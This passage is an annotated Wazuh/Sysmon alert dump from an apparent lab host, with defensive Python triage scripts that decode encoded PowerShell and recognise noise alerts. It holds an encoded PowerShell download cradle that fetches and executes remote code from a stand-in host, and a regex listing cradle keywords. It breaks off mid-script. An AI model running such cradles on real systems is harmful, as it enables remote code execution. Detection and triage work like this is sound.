data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:33:51.154
ProcessGuid: {94294ddc-bc4f-680a-460a-000000000e00}
ProcessId: 11932
Image: C:\Windows\SysWOW64\net.exe
FileVersion: 10.0.26100.1882 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net.exe
CommandLine: net.exe accounts
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00}
ParentProcessId: 3244
ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe
ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe"
ParentUser: NT AUTHORITY\SYSTEM" Closing line of the rendered Sysmon message; the same fields are parsed into the data.win.eventdata.* keys below.
data.win.eventdata.utcTime: 2025-04-24 22:33:51.154 Time Sysmon recorded the process start (UTC).
data.win.eventdata.processGuid: {94294ddc-bc4f-680a-460a-000000000e00} Sysmon GUID for this net.exe instance; join key for anything it generates.
data.win.eventdata.processId: 11932 PID at creation time.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net.exe The 32-bit net.exe from SysWOW64, which is what a 32-bit parent gets when it asks for net.exe; consistent with the parent living under Program Files (x86).
data.win.eventdata.fileVersion: 10.0.26100.1882 (WinBuild.160101.0800) Version string from the PE version resource.
data.win.eventdata.description: Net Command Description from the PE version resource.
data.win.eventdata.product: Microsoft® Windows® Operating System Product name from the PE version resource.
data.win.eventdata.company: Microsoft Corporation Company name from the PE version resource; forgeable, confirm with the hash.
data.win.eventdata.originalFileName: net.exe Internal name compiled into the binary; matches image, so nothing was renamed.
data.win.eventdata.commandLine: net.exe accounts Reads the local password and lockout policy (minimum length, lockout threshold, etc.). This is the command rule 92031 keyed on for T1087 Account Discovery.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ Working directory is the Wazuh agent's install folder.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM Runs as SYSTEM, i.e. from a service, not from the Attcker1 desktop session seen in the PowerShell alerts.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} Sysmon GUID of the SYSTEM logon session.
data.win.eventdata.logonId: 0x3e7 0x3E7 (999) is the well-known logon ID of the local SYSTEM account.
data.win.eventdata.terminalSessionId: 0 Session 0: services, no interactive desktop.
data.win.eventdata.integrityLevel: System Highest integrity level; expected for a child of a service.
data.win.eventdata.hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 SHA256 of net.exe on disk; compare with a known-good hash for this build.
data.win.eventdata.parentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} Sysmon GUID of the parent.
data.win.eventdata.parentProcessId: 3244 PID of the parent.
data.win.eventdata.parentImage: C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe The parent is the Wazuh agent itself. Running net accounts as SYSTEM from the agent's own directory is how the agent's configuration-assessment checks read the password policy, so this hit is most likely the monitoring agent rather than the attacker. Confirm that a policy scan ran on this host at 22:33:51 before closing it, and prefer a child rule of 92031 that lowers the level when parentImage is the agent binary over muting the rule.
data.win.eventdata.parentCommandLine: \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\" Parent's command line: the agent service binary with no arguments.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM Parent runs as SYSTEM, as a service should.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 8 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534206.794207 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that emitted the event (Sysmon), so eventID is a Sysmon ID.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} Sysmon's provider GUID; constant across hosts.
data.win.system.eventID: 11 Sysmon event ID: 11 = File Create. Not a Security-log ID.
data.win.system.version: 2 Schema version of the File Create event.
data.win.system.level: 4 Event level; 4 = Informational. Severity comes from the Wazuh rule.
data.win.system.task: 11 Task category; equals the Sysmon event ID.
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:33:51.4872058Z When the record was written to the channel (UTC).
data.win.system.eventRecordID: 280774 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 PID of the Sysmon service that wrote the record, not of the creating process.
data.win.system.threadID: 4740 Thread inside the Sysmon service; same caveat as processID.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational Event log channel the agent collected this from.
data.win.system.computer: Attacker Hostname recorded in the event; should equal agent.name.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:33:51.481
ProcessGuid: {94294ddc-bc4e-680a-450a-000000000e00}
ProcessId: 9340
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_iirz44hw.ut4.ps1
CreationUtcTime: 2025-04-24 22:33:51.481
User: Attacker\Attcker1" Closing line of the rendered Sysmon message; the same fields are parsed into the data.win.eventdata.* keys below.
data.win.eventdata.utcTime: 2025-04-24 22:33:51.481 Time Sysmon observed the file being created (UTC).
data.win.eventdata.processGuid: {94294ddc-bc4e-680a-450a-000000000e00} Sysmon GUID of the creating process. No Process Create for PID 9340 appears in this list; search for this GUID to find it and its command line.
data.win.eventdata.processId: 9340 PID of the creating process; join on processGuid, not on this.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Executable that created the file.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_iirz44hw.ut4.ps1 Another __PSScriptPolicyTest_<random>.ps1: the file powershell.exe writes to %TEMP% at startup to test AppLocker/WDAC script enforcement. A benign artifact of yet another PowerShell start, which is the interesting fact here.
data.win.eventdata.creationUtcTime: 2025-04-24 22:33:51.481 Creation timestamp on the file; equals utcTime, as expected for a freshly written file.
data.win.eventdata.user: Attacker\\Attcker1 Account the creating process runs as.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
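The three alert types on this page pull in different directions: the __PSScriptPolicyTest_ file drops are PowerShell's own startup artifact, the net.exe accounts hit has the Wazuh agent as its parent, and only the encoded PowerShell launches are a real lead. Joining on Sysmon's ProcessGuid and on the parent image sorts them without hand-reading each one. The following Python is an added example, not Wazuh code: it triages constructed copies of the four alerts shown above (short labels stand in for Wazuh alert ids, the base64 blob is shortened, and only the fields the code reads are kept) and links each file drop back to the Process Create that produced it. The agent install path and the disposition names are this example's assumptions.

```python
"""Triage Sysmon EID 1 / EID 11 alerts by joining on ProcessGuid and parent image.

Added example for this alert dump; not Wazuh code. SAMPLE_ALERTS is constructed from the
data.win.eventdata fields shown on this page, reduced to the fields the triage reads, with
short labels instead of Wazuh alert ids and the base64 blob shortened.
"""
import re
from typing import Dict, List, Optional, Tuple

POWERSHELL_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

SAMPLE_ALERTS: List[dict] = [
    {"label": "ps-11408", "eventID": 1, "eventdata": {
        "processGuid": "{94294ddc-bc3a-680a-340a-000000000e00}",
        "image": POWERSHELL_IMAGE,
        "commandLine": "powershell.exe -NoLogo -NoProfile -EncodedCommand SQBFAFgA",  # blob shortened
        "user": r"Attacker\Attcker1",
        "parentImage": POWERSHELL_IMAGE}},
    {"label": "file-11408", "eventID": 11, "eventdata": {
        "processGuid": "{94294ddc-bc3a-680a-340a-000000000e00}",
        "image": POWERSHELL_IMAGE,
        "targetFilename": r"C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_3tejp41b.qrm.ps1",
        "user": r"Attacker\Attcker1"}},
    {"label": "ps-6832", "eventID": 1, "eventdata": {
        "processGuid": "{94294ddc-bc49-680a-410a-000000000e00}",
        "image": POWERSHELL_IMAGE,
        "commandLine": "powershell.exe -NoLogo -NoProfile -EncodedCommand SQBFAFgA",  # blob shortened
        "user": r"Attacker\Attcker1",
        "parentImage": POWERSHELL_IMAGE}},
    {"label": "net-11932", "eventID": 1, "eventdata": {
        "processGuid": "{94294ddc-bc4f-680a-460a-000000000e00}",
        "image": r"C:\Windows\SysWOW64\net.exe",
        "commandLine": "net.exe accounts",
        "user": r"NT AUTHORITY\SYSTEM",
        "parentImage": r"C:\Program Files (x86)\ossec-agent\wazuh-agent.exe"}},
]

# powershell.exe writes __PSScriptPolicyTest_<random>.<random>.ps1 to %TEMP% at startup to probe
# AppLocker/WDAC script enforcement; the name pattern is stable across PowerShell versions.
PS_POLICY_TEST = re.compile(r"\\__PSScriptPolicyTest_[0-9a-z]+\.[0-9a-z]+\.ps1$", re.IGNORECASE)
# Any accepted prefix of -EncodedCommand followed by a base64 argument.
ENCODED_FLAG = re.compile(r"(?:^|\s)-e(?:c|n[a-z]*)?\s+[A-Za-z0-9+/=]+", re.IGNORECASE)
# Assumption: default Wazuh agent install path on 64-bit Windows (matches parentImage above).
AGENT_IMAGE = r"c:\program files (x86)\ossec-agent\wazuh-agent.exe"
SYSTEM_USER = r"nt authority\system"

# (disposition, reason, label of the related Process Create alert if one is in the batch)
Disposition = Tuple[str, str, Optional[str]]


def triage(alerts: List[dict]) -> Dict[str, Disposition]:
    """Assign each alert a disposition, using ProcessGuid to tie file drops to their process."""
    process_create_by_guid = {a["eventdata"]["processGuid"]: a["label"]
                              for a in alerts if a["eventID"] == 1}
    result: Dict[str, Disposition] = {}
    for alert in alerts:
        ed = alert["eventdata"]
        origin = process_create_by_guid.get(ed.get("processGuid", ""))
        if alert["eventID"] == 11:
            is_powershell = ed.get("image", "").lower().endswith("\\powershell.exe")
            if is_powershell and PS_POLICY_TEST.search(ed.get("targetFilename", "")):
                result[alert["label"]] = (
                    "deprioritize",
                    "PowerShell's own AppLocker/WDAC policy probe; the creating process is the lead",
                    origin)
            else:
                result[alert["label"]] = ("investigate", "file written by " + ed.get("image", "?"), origin)
        elif alert["eventID"] == 1:
            parent_is_agent = ed.get("parentImage", "").lower() == AGENT_IMAGE
            runs_as_system = ed.get("user", "").lower() == SYSTEM_USER
            if parent_is_agent and runs_as_system:
                result[alert["label"]] = (
                    "verify",
                    "spawned by the Wazuh agent as SYSTEM; confirm an agent policy scan ran at this time",
                    None)
            elif ENCODED_FLAG.search(ed.get("commandLine", "")):
                result[alert["label"]] = ("investigate", "encoded PowerShell command line", None)
            else:
                result[alert["label"]] = ("review", "no automatic disposition", None)
    return result


if __name__ == "__main__":
    for label, (disposition, reason, origin) in triage(SAMPLE_ALERTS).items():
        link = f" -> see {origin}" if origin else ""
        print(f"{label:<12} {disposition:<13} {reason}{link}")
```

The verify disposition is deliberately not deprioritize: the page shows the agent as parent, which makes an agent self-check likely but not proven, so closing the alert still needs the scan time checked. The same parent-image test is what a child rule of 92031 would use to lower the level for agent-spawned net.exe without silencing the rule for everyone else.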
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 5 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534206.796971 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that emitted the event (Sysmon), so eventID is a Sysmon ID.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} Sysmon's provider GUID; constant across hosts.
data.win.system.eventID: 1 Sysmon event ID: 1 = Process Create. Not a Security-log ID.
data.win.system.version: 5 Schema version of the Process Create event.
data.win.system.level: 4 Event level; 4 = Informational. Severity comes from the Wazuh rule.
data.win.system.task: 1 Task category; equals the Sysmon event ID.
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:33:59.8990721Z When the record was written to the channel (UTC); about a second after the utcTime in the event body.
data.win.system.eventRecordID: 280869 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 PID of the Sysmon service that wrote the record, not of the process described.
data.win.system.threadID: 4740 Thread inside the Sysmon service; same caveat as processID.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational Event log channel the agent collected this from.
data.win.system.computer: Attacker Hostname recorded in the event; should equal agent.name.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:33:58.812
ProcessGuid: {94294ddc-bc56-680a-4d0a-000000000e00}
ProcessId: 10156
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bc54-680a-4a0a-000000000e00}
ParentProcessId: 12404
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" Rendered message text. It carries the same fields as the data.win.eventdata.* entries below; read it for a quick picture, but search and alert on the parsed fields.
data.win.eventdata.utcTime: 2025-04-24 22:33:58.812 Time the process was created, as recorded by Sysmon. Use this, not systemTime, for the timeline.
data.win.eventdata.processGuid: {94294ddc-bc56-680a-4d0a-000000000e00} Sysmon's unique process identifier. Unlike a PID it is never reused, so join EID 1, 3 and 11 events on it. The second and third fields (bc56, 680a) are the start time as hex Unix seconds: 0x680abc56 = 22:33:58 UTC, matching utcTime.
data.win.eventdata.processId: 10156 Windows PID. Fine for a live pivot on the host, unreliable across a long log because PIDs are reused after exit.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Full path of the executable (the doubled backslashes are JSON escaping). This is the real powershell.exe in System32, so the signal is in how it was launched, not what it is.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Version resource of the image; tells you which Windows build shipped the binary.
data.win.eventdata.description: Windows PowerShell Description string from the version resource.
data.win.eventdata.product: Microsoft® Windows® Operating System Product string from the version resource.
data.win.eventdata.company: Microsoft Corporation Company string from the version resource. These strings are only as trustworthy as the hash below; a System32 path with a missing or odd Company is the anomaly to look for.
data.win.eventdata.originalFileName: PowerShell.EXE Internal name from the version resource. Compare it with the image name: a powershell.exe copied to notepad.exe still reports PowerShell.EXE here.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA Command line as launched; the executable path appears twice, a harmless quirk but a useful fingerprint for this chain. The payload is -EncodedCommand, which is base64 of a UTF-16LE script. Decoded it reads IEX(New-Object Net.WebClient).DownloadString('https://example.com/test'): a download cradle that fetches remote code and executes it in memory. Always decode this field before triaging.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ Working directory of the new process; the user's profile root, consistent with an interactive session.
data.win.eventdata.user: Attacker\\Attcker1 Account the process runs as. Attacker is the hostname, so this is a local account, not a domain one.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} Identifies the logon session; the same value appears on every process started in that session.
data.win.eventdata.logonId: 0x26584 Logon session ID. It matches the Logon ID in the Security 4624 event for this session, so pivot there for logon type and source address.
data.win.eventdata.terminalSessionId: 1 Windows session number. 1 is an interactive (console or RDP) session; services run in session 0.
data.win.eventdata.integrityLevel: Medium Not elevated. This chain runs with the user's rights only unless a later child shows High.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC SHA256 of the image file. It is the same in every alert of this chain and will match a clean powershell.exe, so a reputation lookup will not flag it.
data.win.eventdata.parentProcessGuid: {94294ddc-bc54-680a-4a0a-000000000e00} Parent's Sysmon GUID. Its time field (bc54) is two seconds before the child's (bc56), so the parent started at 22:33:56.
data.win.eventdata.parentProcessId: 12404 Parent PID; find its own Process Create event to walk the chain upward.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe PowerShell spawning PowerShell.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA Identical to the child's command line, same encoded cradle. The parent ran nothing but that cradle (-NoProfile), so whatever came back from the URL launched the cradle again; expect one of these alerts every few seconds until the chain is stopped.
data.win.eventdata.parentUser: Attacker\\Attcker1 Same account as the child; no token change between parent and child.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 9 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534206.805041 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that wrote the event; Sysmon, so eventID is on the Sysmon scale.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} GUID of the Sysmon provider; constant, safe to filter on.
data.win.system.eventID: 11 Sysmon Event ID 11, FileCreate: a file was created or overwritten. It fires on the path, not the content, so the follow-up is always on the writing process.
data.win.system.version: 2 Schema version of the EID 11 event type.
data.win.system.level: 4 ETW level 4 = Informational; every Sysmon event uses it.
data.win.system.task: 11 Task category; repeats the event ID for Sysmon.
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:34:00.0990056Z When the record was logged; the file was created at UtcTime in the message (22:34:00.059).
data.win.system.eventRecordID: 280870 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 PID of the Sysmon service writing the record, not of the process that created the file (that is data.win.eventdata.processId).
data.win.system.threadID: 4740 Sysmon service thread; not the subject.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational Event log channel the agent subscribed to.
data.win.system.computer: Attacker Hostname in the event header; should match agent.name.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:34:00.059
ProcessGuid: {94294ddc-bc56-680a-4d0a-000000000e00}
ProcessId: 10156
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_e3qarsmw.y43.ps1
CreationUtcTime: 2025-04-24 22:34:00.059
User: Attacker\Attcker1" Rendered message text; the same fields as the data.win.eventdata.* entries below. Query the parsed fields, not this string.
data.win.eventdata.utcTime: 2025-04-24 22:34:00.059 When the file was created, as recorded by Sysmon.
data.win.eventdata.processGuid: {94294ddc-bc56-680a-4d0a-000000000e00} Same GUID as the Process Create alert above: the encoded-command PowerShell is the writer. This is the join that turns a noisy file alert into evidence.
data.win.eventdata.processId: 10156 Matches the PID above as well; PID plus GUID together rule out reuse.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe The process that wrote the file.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_e3qarsmw.y43.ps1 The file path. A __PSScriptPolicyTest_<8 chars>.<3 chars>.ps1 in %TEMP% is written by PowerShell itself at startup to probe AppLocker/WDAC script enforcement; on its own it is benign and a well-known noise source for this rule. The signal here is the writer, not the file: pivot on processGuid to the EID 1 event.
data.win.eventdata.creationUtcTime: 2025-04-24 22:34:00.059 The file's creation timestamp. Equal to utcTime, so a genuinely new file; if it were earlier, an existing file was overwritten in place.
data.win.eventdata.user: Attacker\\Attcker1 Account that wrote the file; same user as the EID 1 event.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
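The two alert types above, the EID 1 Process Create carrying an -EncodedCommand cradle and the EID 11 FileCreate of a __PSScriptPolicyTest probe, can be triaged mechanically: decode the payload, look for download-cradle vocabulary, recover start times from the Sysmon ProcessGuid, and recognise the policy-test file so the analyst pivots to its writer instead of the file. The script below is an added example for this page, not Wazuh or Sysmon code. Its two sample messages are constructed from the fields shown in the alerts above; the regexes, function names and verdict labels are the author's own choices, and the ProcessGuid decoding relies on Sysmon's documented layout (second and third GUID fields hold the process start time as Unix seconds).

```python
"""Triage helpers for Sysmon EID 1 / EID 11 messages as Wazuh renders them (added example)."""
import base64
import re
from datetime import datetime, timezone

# Constructed sample: the EID 1 message block of the Process Create alert above,
# trimmed to the fields this script uses.
EID1_MESSAGE = r"""Process Create:
RuleName: -
UtcTime: 2025-04-24 22:33:58.812
ProcessGuid: {94294ddc-bc56-680a-4d0a-000000000e00}
ProcessId: 10156
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
IntegrityLevel: Medium
ParentProcessGuid: {94294ddc-bc54-680a-4a0a-000000000e00}
ParentProcessId: 12404
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"""

# Constructed sample: the EID 11 message block of the FileCreate alert above.
EID11_MESSAGE = r"""File created:
RuleName: -
UtcTime: 2025-04-24 22:34:00.059
ProcessGuid: {94294ddc-bc56-680a-4d0a-000000000e00}
ProcessId: 10156
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_e3qarsmw.y43.ps1
CreationUtcTime: 2025-04-24 22:34:00.059
"""

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENCODED_RE = re.compile(r"-e[ncodema]*\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
# Download-cradle vocabulary worth flagging in a decoded script (author's list, not exhaustive).
CRADLE_RE = re.compile(
    r"\b(IEX|Invoke-Expression|Net\.WebClient|DownloadString|DownloadFile|"
    r"Invoke-WebRequest|iwr|Invoke-RestMethod|irm|curl|wget)\b",
    re.IGNORECASE,
)
# PowerShell writes this probe to %TEMP% at startup to test AppLocker/WDAC script policy;
# the name is an 8.3 random file name followed by .ps1.
POLICY_TEST_RE = re.compile(
    r"\\Temp\\__PSScriptPolicyTest_[a-z0-9]{8}\.[a-z0-9]{3}\.ps1$", re.IGNORECASE
)


def parse_sysmon_message(text: str) -> dict:
    """Turn the rendered 'Key: Value' block into a dict; the first line is the event type."""
    lines = [ln for ln in text.splitlines() if ln.strip()]
    fields = {"EventType": lines[0].rstrip(":")}
    for ln in lines[1:]:
        key, _, value = ln.partition(": ")
        fields[key.strip()] = value.strip()
    return fields


def decode_encoded_command(cmdline: str):
    """Return the script behind -EncodedCommand (base64 of UTF-16LE), or None if absent/invalid."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def cradle_indicators(script: str) -> list:
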